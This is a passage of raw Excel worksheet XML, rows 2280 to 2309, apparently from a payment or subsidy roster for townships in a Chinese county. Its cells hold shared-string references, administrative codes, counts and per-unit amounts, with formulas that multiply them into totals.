      </c>
      <c r="C2280" s="24" t="s">
        <v>5988</v>
      </c>
      <c r="D2280" s="24" t="s">
        <v>5991</v>
      </c>
      <c r="E2280" s="24" t="s">
        <v>5992</v>
      </c>
      <c r="F2280" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2280" s="24">
        <v>1</v>
      </c>
      <c r="H2280" s="25">
        <v>365</v>
      </c>
      <c r="I2280" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2280" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2280" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2281" customHeight="1" spans="1:11">
      <c r="A2281" s="23" t="s">
        <v>5993</v>
      </c>
      <c r="B2281" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2281" s="24" t="s">
        <v>5994</v>
      </c>
      <c r="D2281" s="24" t="s">
        <v>5995</v>
      </c>
      <c r="E2281" s="24" t="s">
        <v>5996</v>
      </c>
      <c r="F2281" s="24" t="s">
        <v>5997</v>
      </c>
      <c r="G2281" s="24">
        <v>2</v>
      </c>
      <c r="H2281" s="25">
        <v>325</v>
      </c>
      <c r="I2281" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2281" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2281" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2282" customHeight="1" spans="1:11">
      <c r="A2282" s="23" t="s">
        <v>5998</v>
      </c>
      <c r="B2282" s="24" t="str">
        <f>B2281</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2282" s="24" t="str">
        <f>C2281</f>
        <v>水泥厂</v>
      </c>
      <c r="D2282" s="30" t="s">
        <v>5999</v>
      </c>
      <c r="E2282" s="30" t="s">
        <v>6000</v>
      </c>
      <c r="F2282" s="24" t="str">
        <f>F2281</f>
        <v>411321071405</v>
      </c>
      <c r="G2282" s="24"/>
      <c r="H2282" s="24"/>
      <c r="I2282" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2282" s="24"/>
      <c r="K2282" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2283" customHeight="1" spans="1:11">
      <c r="A2283" s="23" t="s">
        <v>6001</v>
      </c>
      <c r="B2283" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2283" s="24" t="s">
        <v>5994</v>
      </c>
      <c r="D2283" s="24" t="s">
        <v>6002</v>
      </c>
      <c r="E2283" s="24" t="s">
        <v>5831</v>
      </c>
      <c r="F2283" s="24" t="s">
        <v>5997</v>
      </c>
      <c r="G2283" s="24">
        <v>2</v>
      </c>
      <c r="H2283" s="25">
        <v>325</v>
      </c>
      <c r="I2283" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2283" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2283" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2284" customHeight="1" spans="1:11">
      <c r="A2284" s="23" t="s">
        <v>6003</v>
      </c>
      <c r="B2284" s="24" t="str">
        <f>B2283</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2284" s="24" t="str">
        <f>C2283</f>
        <v>水泥厂</v>
      </c>
      <c r="D2284" s="30" t="s">
        <v>6004</v>
      </c>
      <c r="E2284" s="90" t="s">
        <v>425</v>
      </c>
      <c r="F2284" s="24" t="str">
        <f>F2283</f>
        <v>411321071405</v>
      </c>
      <c r="G2284" s="24"/>
      <c r="H2284" s="24"/>
      <c r="I2284" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2284" s="24"/>
      <c r="K2284" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2285" customHeight="1" spans="1:11">
      <c r="A2285" s="23" t="s">
        <v>6005</v>
      </c>
      <c r="B2285" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2285" s="24" t="s">
        <v>5994</v>
      </c>
      <c r="D2285" s="24" t="s">
        <v>6006</v>
      </c>
      <c r="E2285" s="24" t="s">
        <v>5886</v>
      </c>
      <c r="F2285" s="24" t="s">
        <v>5997</v>
      </c>
      <c r="G2285" s="24">
        <v>1</v>
      </c>
      <c r="H2285" s="25">
        <v>365</v>
      </c>
      <c r="I2285" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2285" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2285" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2286" customHeight="1" spans="1:11">
      <c r="A2286" s="23" t="s">
        <v>6007</v>
      </c>
      <c r="B2286" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2286" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D2286" s="24" t="s">
        <v>6008</v>
      </c>
      <c r="E2286" s="24" t="s">
        <v>5771</v>
      </c>
      <c r="F2286" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2286" s="24">
        <v>1</v>
      </c>
      <c r="H2286" s="25">
        <v>365</v>
      </c>
      <c r="I2286" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2286" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2286" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2287" customHeight="1" spans="1:11">
      <c r="A2287" s="23" t="s">
        <v>6009</v>
      </c>
      <c r="B2287" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2287" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D2287" s="24" t="s">
        <v>6010</v>
      </c>
      <c r="E2287" s="24" t="s">
        <v>5380</v>
      </c>
      <c r="F2287" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2287" s="24">
        <v>1</v>
      </c>
      <c r="H2287" s="25">
        <v>365</v>
      </c>
      <c r="I2287" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2287" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2287" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2288" customHeight="1" spans="1:11">
      <c r="A2288" s="23" t="s">
        <v>6011</v>
      </c>
      <c r="B2288" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2288" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D2288" s="24" t="s">
        <v>6012</v>
      </c>
      <c r="E2288" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F2288" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2288" s="24">
        <v>1</v>
      </c>
      <c r="H2288" s="25">
        <v>365</v>
      </c>
      <c r="I2288" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2288" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2288" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2289" customHeight="1" spans="1:209">
      <c r="A2289" s="23" t="s">
        <v>6013</v>
      </c>
      <c r="B2289" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2289" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2289" s="24" t="s">
        <v>6015</v>
      </c>
      <c r="E2289" s="24" t="s">
        <v>5949</v>
      </c>
      <c r="F2289" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2289" s="24">
        <v>1</v>
      </c>
      <c r="H2289" s="25">
        <v>365</v>
      </c>
      <c r="I2289" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2289" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2289" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2290" customHeight="1" spans="1:209">
      <c r="A2290" s="23" t="s">
        <v>6017</v>
      </c>
      <c r="B2290" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2290" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2290" s="24" t="s">
        <v>6018</v>
      </c>
      <c r="E2290" s="24" t="s">
        <v>5666</v>
      </c>
      <c r="F2290" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2290" s="24">
        <v>1</v>
      </c>
      <c r="H2290" s="25">
        <v>365</v>
      </c>
      <c r="I2290" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2290" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2290" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2291" customHeight="1" spans="1:209">
      <c r="A2291" s="23" t="s">
        <v>6019</v>
      </c>
      <c r="B2291" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2291" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2291" s="24" t="s">
        <v>6020</v>
      </c>
      <c r="E2291" s="24" t="s">
        <v>5355</v>
      </c>
      <c r="F2291" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2291" s="24">
        <v>1</v>
      </c>
      <c r="H2291" s="25">
        <v>365</v>
      </c>
      <c r="I2291" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2291" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2291" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2292" customHeight="1" spans="1:209">
      <c r="A2292" s="23" t="s">
        <v>6021</v>
      </c>
      <c r="B2292" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2292" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2292" s="24" t="s">
        <v>6022</v>
      </c>
      <c r="E2292" s="24" t="s">
        <v>5058</v>
      </c>
      <c r="F2292" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2292" s="24">
        <v>1</v>
      </c>
      <c r="H2292" s="25">
        <v>365</v>
      </c>
      <c r="I2292" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2292" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2292" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2293" customHeight="1" spans="1:209">
      <c r="A2293" s="23" t="s">
        <v>6023</v>
      </c>
      <c r="B2293" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2293" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2293" s="24" t="s">
        <v>6024</v>
      </c>
      <c r="E2293" s="24" t="s">
        <v>5493</v>
      </c>
      <c r="F2293" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2293" s="24">
        <v>1</v>
      </c>
      <c r="H2293" s="25">
        <v>365</v>
      </c>
      <c r="I2293" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2293" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2293" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2294" customHeight="1" spans="1:209">
      <c r="A2294" s="23" t="s">
        <v>6025</v>
      </c>
      <c r="B2294" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2294" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2294" s="24" t="s">
        <v>6026</v>
      </c>
      <c r="E2294" s="24" t="s">
        <v>5840</v>
      </c>
      <c r="F2294" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2294" s="24">
        <v>1</v>
      </c>
      <c r="H2294" s="25">
        <v>365</v>
      </c>
      <c r="I2294" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2294" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2294" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2295" customHeight="1" spans="1:209">
      <c r="A2295" s="23" t="s">
        <v>6027</v>
      </c>
      <c r="B2295" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2295" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2295" s="24" t="s">
        <v>6028</v>
      </c>
      <c r="E2295" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F2295" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2295" s="24">
        <v>1</v>
      </c>
      <c r="H2295" s="25">
        <v>365</v>
      </c>
      <c r="I2295" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2295" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2295" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2296" customHeight="1" spans="1:209">
      <c r="A2296" s="23" t="s">
        <v>6029</v>
      </c>
      <c r="B2296" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2296" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2296" s="24" t="s">
        <v>6030</v>
      </c>
      <c r="E2296" s="24" t="s">
        <v>5419</v>
      </c>
      <c r="F2296" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2296" s="24">
        <v>1</v>
      </c>
      <c r="H2296" s="25">
        <v>365</v>
      </c>
      <c r="I2296" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2296" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2296" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2297" customHeight="1" spans="1:209">
      <c r="A2297" s="23" t="s">
        <v>6031</v>
      </c>
      <c r="B2297" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2297" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2297" s="24" t="s">
        <v>6032</v>
      </c>
      <c r="E2297" s="24" t="s">
        <v>5015</v>
      </c>
      <c r="F2297" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2297" s="24">
        <v>1</v>
      </c>
      <c r="H2297" s="25">
        <v>365</v>
      </c>
      <c r="I2297" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2297" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2297" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2298" customHeight="1" spans="1:209">
      <c r="A2298" s="23" t="s">
        <v>6033</v>
      </c>
      <c r="B2298" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2298" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2298" s="24" t="s">
        <v>6034</v>
      </c>
      <c r="E2298" s="24" t="s">
        <v>5517</v>
      </c>
      <c r="F2298" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2298" s="24">
        <v>1</v>
      </c>
      <c r="H2298" s="25">
        <v>365</v>
      </c>
      <c r="I2298" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2298" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2298" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2299" customHeight="1" spans="1:209">
      <c r="A2299" s="23" t="s">
        <v>6035</v>
      </c>
      <c r="B2299" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2299" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2299" s="24" t="s">
        <v>6036</v>
      </c>
      <c r="E2299" s="24" t="s">
        <v>5544</v>
      </c>
      <c r="F2299" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2299" s="24">
        <v>1</v>
      </c>
      <c r="H2299" s="25">
        <v>365</v>
      </c>
      <c r="I2299" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2299" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2299" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2300" customHeight="1" spans="1:209">
      <c r="A2300" s="23" t="s">
        <v>6037</v>
      </c>
      <c r="B2300" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2300" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2300" s="24" t="s">
        <v>6038</v>
      </c>
      <c r="E2300" s="24" t="s">
        <v>6039</v>
      </c>
      <c r="F2300" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2300" s="24">
        <v>1</v>
      </c>
      <c r="H2300" s="25">
        <v>365</v>
      </c>
      <c r="I2300" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2300" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K2300" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2301" customHeight="1" spans="1:209">
      <c r="A2301" s="23" t="s">
        <v>6040</v>
      </c>
      <c r="B2301" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2301" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2301" s="24" t="s">
        <v>6041</v>
      </c>
      <c r="E2301" s="24" t="s">
        <v>5400</v>
      </c>
      <c r="F2301" s="24" t="s">
        <v>6042</v>
      </c>
      <c r="G2301" s="24">
        <v>2</v>
      </c>
      <c r="H2301" s="25">
        <v>325</v>
      </c>
      <c r="I2301" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2301" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K2301" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2302" s="6" customFormat="1" customHeight="1" spans="1:209">
      <c r="A2302" s="23" t="s">
        <v>6043</v>
      </c>
      <c r="B2302" s="89" t="s">
        <v>5352</v>
      </c>
      <c r="C2302" s="89" t="s">
        <v>5353</v>
      </c>
      <c r="D2302" s="89" t="s">
        <v>6044</v>
      </c>
      <c r="E2302" s="91" t="s">
        <v>5385</v>
      </c>
      <c r="F2302" s="24" t="s">
        <v>6042</v>
      </c>
      <c r="G2302" s="92"/>
      <c r="H2302" s="89"/>
      <c r="I2302" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2302" s="23" t="s">
        <v>2071</v>
      </c>
      <c r="K2302" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2302" s="8"/>
      <c r="M2302" s="7"/>
      <c r="N2302" s="7"/>
      <c r="O2302" s="7"/>
      <c r="P2302" s="7"/>
      <c r="Q2302" s="7"/>
      <c r="R2302" s="7"/>
      <c r="S2302" s="7"/>
      <c r="T2302" s="7"/>
      <c r="U2302" s="7"/>
      <c r="V2302" s="7"/>
      <c r="W2302" s="7"/>
      <c r="X2302" s="7"/>
      <c r="Y2302" s="7"/>
      <c r="Z2302" s="7"/>
      <c r="AA2302" s="7"/>
      <c r="AB2302" s="7"/>
      <c r="AC2302" s="7"/>
      <c r="AD2302" s="7"/>
      <c r="AE2302" s="7"/>
      <c r="AF2302" s="7"/>
      <c r="AG2302" s="7"/>
      <c r="AH2302" s="7"/>
      <c r="AI2302" s="7"/>
      <c r="AJ2302" s="7"/>
      <c r="AK2302" s="7"/>
      <c r="AL2302" s="7"/>
      <c r="AM2302" s="7"/>
      <c r="AN2302" s="7"/>
      <c r="AO2302" s="7"/>
      <c r="AP2302" s="7"/>
      <c r="AQ2302" s="7"/>
      <c r="AR2302" s="7"/>
      <c r="AS2302" s="7"/>
      <c r="AT2302" s="7"/>
      <c r="AU2302" s="7"/>
      <c r="AV2302" s="7"/>
      <c r="AW2302" s="7"/>
      <c r="AX2302" s="7"/>
      <c r="AY2302" s="7"/>
      <c r="AZ2302" s="7"/>
      <c r="BA2302" s="7"/>
      <c r="BB2302" s="7"/>
      <c r="BC2302" s="7"/>
      <c r="BD2302" s="7"/>
      <c r="BE2302" s="7"/>
      <c r="BF2302" s="7"/>
      <c r="BG2302" s="7"/>
      <c r="BH2302" s="7"/>
      <c r="BI2302" s="7"/>
      <c r="BJ2302" s="7"/>
      <c r="BK2302" s="7"/>
      <c r="BL2302" s="7"/>
      <c r="BM2302" s="7"/>
      <c r="BN2302" s="7"/>
      <c r="BO2302" s="7"/>
      <c r="BP2302" s="7"/>
      <c r="BQ2302" s="7"/>
      <c r="BR2302" s="7"/>
      <c r="BS2302" s="7"/>
      <c r="BT2302" s="7"/>
      <c r="BU2302" s="7"/>
      <c r="BV2302" s="7"/>
      <c r="BW2302" s="7"/>
      <c r="BX2302" s="7"/>
      <c r="BY2302" s="7"/>
      <c r="BZ2302" s="7"/>
      <c r="CA2302" s="7"/>
      <c r="CB2302" s="7"/>
      <c r="CC2302" s="7"/>
      <c r="CD2302" s="7"/>
      <c r="CE2302" s="7"/>
      <c r="CF2302" s="7"/>
      <c r="CG2302" s="7"/>
      <c r="CH2302" s="7"/>
      <c r="CI2302" s="7"/>
      <c r="CJ2302" s="7"/>
      <c r="CK2302" s="7"/>
      <c r="CL2302" s="7"/>
      <c r="CM2302" s="7"/>
      <c r="CN2302" s="7"/>
      <c r="CO2302" s="7"/>
      <c r="CP2302" s="7"/>
      <c r="CQ2302" s="7"/>
      <c r="CR2302" s="7"/>
      <c r="CS2302" s="7"/>
      <c r="CT2302" s="7"/>
      <c r="CU2302" s="7"/>
      <c r="CV2302" s="7"/>
      <c r="CW2302" s="7"/>
      <c r="CX2302" s="7"/>
      <c r="CY2302" s="7"/>
      <c r="CZ2302" s="7"/>
      <c r="DA2302" s="7"/>
      <c r="DB2302" s="7"/>
      <c r="DC2302" s="7"/>
      <c r="DD2302" s="7"/>
      <c r="DE2302" s="7"/>
      <c r="DF2302" s="7"/>
      <c r="DG2302" s="7"/>
      <c r="DH2302" s="7"/>
      <c r="DI2302" s="7"/>
      <c r="DJ2302" s="7"/>
      <c r="DK2302" s="7"/>
      <c r="DL2302" s="7"/>
      <c r="DM2302" s="7"/>
      <c r="DN2302" s="7"/>
      <c r="DO2302" s="7"/>
      <c r="DP2302" s="7"/>
      <c r="DQ2302" s="7"/>
      <c r="DR2302" s="7"/>
      <c r="DS2302" s="7"/>
      <c r="DT2302" s="7"/>
      <c r="DU2302" s="7"/>
      <c r="DV2302" s="7"/>
      <c r="DW2302" s="7"/>
      <c r="DX2302" s="7"/>
      <c r="DY2302" s="7"/>
      <c r="DZ2302" s="7"/>
      <c r="EA2302" s="7"/>
      <c r="EB2302" s="7"/>
      <c r="EC2302" s="7"/>
      <c r="ED2302" s="7"/>
      <c r="EE2302" s="7"/>
      <c r="EF2302" s="7"/>
      <c r="EG2302" s="7"/>
      <c r="EH2302" s="7"/>
      <c r="EI2302" s="7"/>
      <c r="EJ2302" s="7"/>
      <c r="EK2302" s="7"/>
      <c r="EL2302" s="7"/>
      <c r="EM2302" s="7"/>
      <c r="EN2302" s="7"/>
      <c r="EO2302" s="7"/>
      <c r="EP2302" s="7"/>
      <c r="EQ2302" s="7"/>
      <c r="ER2302" s="7"/>
      <c r="ES2302" s="7"/>
      <c r="ET2302" s="7"/>
      <c r="EU2302" s="7"/>
      <c r="EV2302" s="7"/>
      <c r="EW2302" s="7"/>
      <c r="EX2302" s="7"/>
      <c r="EY2302" s="7"/>
      <c r="EZ2302" s="7"/>
      <c r="FA2302" s="7"/>
      <c r="FB2302" s="7"/>
      <c r="FC2302" s="7"/>
      <c r="FD2302" s="7"/>
      <c r="FE2302" s="7"/>
      <c r="FF2302" s="7"/>
      <c r="FG2302" s="7"/>
      <c r="FH2302" s="7"/>
      <c r="FI2302" s="7"/>
      <c r="FJ2302" s="7"/>
      <c r="FK2302" s="7"/>
      <c r="FL2302" s="7"/>
      <c r="FM2302" s="7"/>
      <c r="FN2302" s="7"/>
      <c r="FO2302" s="7"/>
      <c r="FP2302" s="7"/>
      <c r="FQ2302" s="7"/>
      <c r="FR2302" s="7"/>
      <c r="FS2302" s="7"/>
      <c r="FT2302" s="7"/>
      <c r="FU2302" s="7"/>
      <c r="FV2302" s="7"/>
      <c r="FW2302" s="7"/>
      <c r="FX2302" s="7"/>
      <c r="FY2302" s="7"/>
      <c r="FZ2302" s="7"/>
      <c r="GA2302" s="7"/>
      <c r="GB2302" s="7"/>
      <c r="GC2302" s="7"/>
      <c r="GD2302" s="7"/>
      <c r="GE2302" s="7"/>
      <c r="GF2302" s="7"/>
      <c r="GG2302" s="7"/>
      <c r="GH2302" s="7"/>
      <c r="GI2302" s="7"/>
      <c r="GJ2302" s="7"/>
      <c r="GK2302" s="7"/>
      <c r="GL2302" s="7"/>
      <c r="GM2302" s="7"/>
      <c r="GN2302" s="7"/>
      <c r="GO2302" s="7"/>
      <c r="GP2302" s="7"/>
      <c r="GQ2302" s="7"/>
      <c r="GR2302" s="7"/>
      <c r="GS2302" s="7"/>
      <c r="GT2302" s="7"/>
      <c r="GU2302" s="7"/>
      <c r="GV2302" s="7"/>
      <c r="GW2302" s="7"/>
      <c r="GX2302" s="7"/>
      <c r="GY2302" s="7"/>
      <c r="GZ2302" s="7"/>
      <c r="HA2302" s="7"/>
    </row>
    <row r="2303" customHeight="1" spans="1:209">
      <c r="A2303" s="23" t="s">
        <v>6045</v>
      </c>
      <c r="B2303" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2303" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2303" s="24" t="s">
        <v>6046</v>
      </c>
      <c r="E2303" s="24" t="s">
        <v>5380</v>
      </c>
      <c r="F2303" s="24" t="s">
        <v>6047</v>
      </c>
      <c r="G2303" s="24">
        <v>1</v>
      </c>
      <c r="H2303" s="25">
        <v>365</v>
      </c>
      <c r="I2303" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2303" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K2303" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2304" customHeight="1" spans="1:209">
      <c r="A2304" s="23" t="s">
        <v>6048</v>
      </c>
      <c r="B2304" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2304" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2304" s="24" t="s">
        <v>6049</v>
      </c>
      <c r="E2304" s="24" t="s">
        <v>6050</v>
      </c>
      <c r="F2304" s="170" t="s">
        <v>6047</v>
      </c>
      <c r="G2304" s="24">
        <v>1</v>
      </c>
      <c r="H2304" s="25">
        <v>365</v>
      </c>
      <c r="I2304" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2304" s="41">
        <v>45627</v>
      </c>
      <c r="K2304" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2305" customHeight="1" spans="1:14">
      <c r="A2305" s="23" t="s">
        <v>6051</v>
      </c>
      <c r="B2305" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2305" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2305" s="24" t="s">
        <v>6052</v>
      </c>
      <c r="E2305" s="24" t="s">
        <v>5486</v>
      </c>
      <c r="F2305" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2305" s="24">
        <v>1</v>
      </c>
      <c r="H2305" s="25">
        <v>365</v>
      </c>
      <c r="I2305" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2305" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2305" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2306" s="7" customFormat="1" customHeight="1" spans="1:14">
      <c r="A2306" s="23" t="s">
        <v>6053</v>
      </c>
      <c r="B2306" s="93" t="s">
        <v>5352</v>
      </c>
      <c r="C2306" s="93" t="s">
        <v>6014</v>
      </c>
      <c r="D2306" s="94" t="s">
        <v>6054</v>
      </c>
      <c r="E2306" s="95" t="s">
        <v>6055</v>
      </c>
      <c r="F2306" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2306" s="24">
        <v>1</v>
      </c>
      <c r="H2306" s="25">
        <v>365</v>
      </c>
      <c r="I2306" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2306" s="96" t="s">
        <v>3080</v>
      </c>
      <c r="K2306" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L2306" s="8"/>
      <c r="M2306" s="8"/>
      <c r="N2306" s="8"/>
    </row>
    <row r="2307" customHeight="1" spans="1:14">
      <c r="A2307" s="23" t="s">
        <v>6056</v>
      </c>
      <c r="B2307" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2307" s="24" t="s">
        <v>6014</v>
      </c>
      <c r="D2307" s="24" t="s">
        <v>6057</v>
      </c>
      <c r="E2307" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2307" s="24" t="s">
        <v>6016</v>
      </c>
      <c r="G2307" s="24">
        <v>1</v>
      </c>
      <c r="H2307" s="25">
        <v>365</v>
      </c>
      <c r="I2307" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2307" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2307" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2308" customHeight="1" spans="1:14">
      <c r="A2308" s="23" t="s">
        <v>6058</v>
      </c>
      <c r="B2308" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2308" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="D2308" s="24" t="s">
        <v>6060</v>
      </c>
      <c r="E2308" s="24" t="s">
        <v>6061</v>
      </c>
      <c r="F2308" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2308" s="24">
        <v>3</v>
      </c>
      <c r="H2308" s="25">
        <v>290</v>
      </c>
      <c r="I2308" s="24">
        <f t="shared" ref="I2308:I2371" si="36">H2308*G2308</f>
        <v>870</v>
      </c>
      <c r="J2308" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2308" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2309" customHeight="1" spans="1:14">
      <c r="A2309" s="23" t="s">
        <v>6063</v>
      </c>
      <c r="B2309" s="24" t="str">
        <f>B2308</f>
        <v>石门乡</v>
      </c>
      <c r="C2309" s="24" t="str">
        <f>C2308</f>
        <v>石门乡</v>
      </c>
      <c r="D2309" s="32" t="s">
        <v>6064</v>
      </c>
      <c r="E2309" s="43" t="s">
        <v>6065</v>
      </c>
      <c r="F2309" s="24" t="str">
        <f>F2308</f>
        <v>4113210920</v>
      </c>
      <c r="G2309" s="24"/>
      <c r="H2309" s="24"/>
      <c r="I2309" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
